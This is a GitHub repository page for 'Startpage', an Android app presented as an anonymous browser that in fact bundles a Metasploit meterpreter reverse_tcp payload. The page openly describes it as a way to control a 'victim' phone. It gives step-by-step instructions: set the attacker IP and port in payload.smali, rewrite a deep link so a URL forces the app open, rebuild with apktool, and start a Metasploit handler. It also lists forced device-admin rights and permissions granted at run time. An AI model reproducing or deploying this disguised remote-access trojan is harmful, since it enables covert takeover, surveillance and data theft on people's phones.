Ba-hub / Startpage

Startpage is an anonymous browser. This is help to hide your IP or cookies & not to track. This is an application which is binded with metasploit code. Its help to control your victim android phone & listening connection by metasploit-framework android/meterpreter/reverse_tcp

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


A Metasploit Base Payload & Anonymous Browser Interface

Features

  • Listening Connection By Metasploit Framework
  • android/meterpreter/reverse_tcp
  • Added Deep Link Service
  • Enable Device Admin Apk
  • Enable all permission in run time

Prerequisites

  • Metasploit Framework
    • apktool
  • apk-signer click HERE for Repository Clone

Screenshot




Instructions

** Go to payload.smali Line No 19

.field public static final URL:Ljava/lang/String; = "ZZZZtcp://192.168.225.178:4444"

---- Change The IP Or Port

** Go to AndroidManifeast.xml Line No 42

<data android:host="www.github.com" android:pathPrefix="/Ba-hub" android:scheme="myapp" />

--- change the host | pathPrefix | scheme [http/https/myapp] as your Wish Which Is Force to Open App By Your Provided URL same As Above

Apk Build

apt install apktool 

apktool b -f Startpage -o Startpage.apk

You Can Also Edit By ApkEditor & ApkEditor Pro click HERE for downloads the Demo Apk

Listening Connection By Metasploit


msfconsole -q

msf6> use exploit/multi/handler

msf6> set payload android/meterpreter/reverse_tcp 

msf6> set LHOST <IP>

msf6> set LPORT <port>

msf6> exploit -j 


Made with đź’€ By Ghosthub

About

Startpage is an anonymous browser. This is help to hide your IP or cookies & not to track. This is an application which is binded with metasploit code. Its help to control your victim android phone & listening connection by metasploit-framework android/meterpreter/reverse_tcp


Languages

Language:Smali 100.0%